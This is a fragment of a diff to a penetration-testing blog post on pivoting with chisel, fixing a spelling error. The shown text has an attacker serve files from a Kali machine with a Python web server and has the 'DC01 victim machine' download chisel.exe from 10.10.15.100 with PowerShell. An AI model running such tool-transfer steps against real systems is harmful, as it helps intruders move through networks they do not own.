ubghacking/ubghacking.github.io/_posts/2023-06-26-chisel-pivoting-part2.md

 python -m http.server 80
 {% endhighlight %}

 This will start a web server using port 80 on your Kali machine.
-From the DC01 victim machine, use PowerSHell's Invoke-WebRequest cmdlet to download chisel.exe:
+From the DC01 victim machine, use PowerShell's Invoke-WebRequest cmdlet to download chisel.exe:

 {% highlight bash linenos %}
 Invoke-WebRequest -URI http://10.10.15.100/chisel.exe -OutFile chisel.exe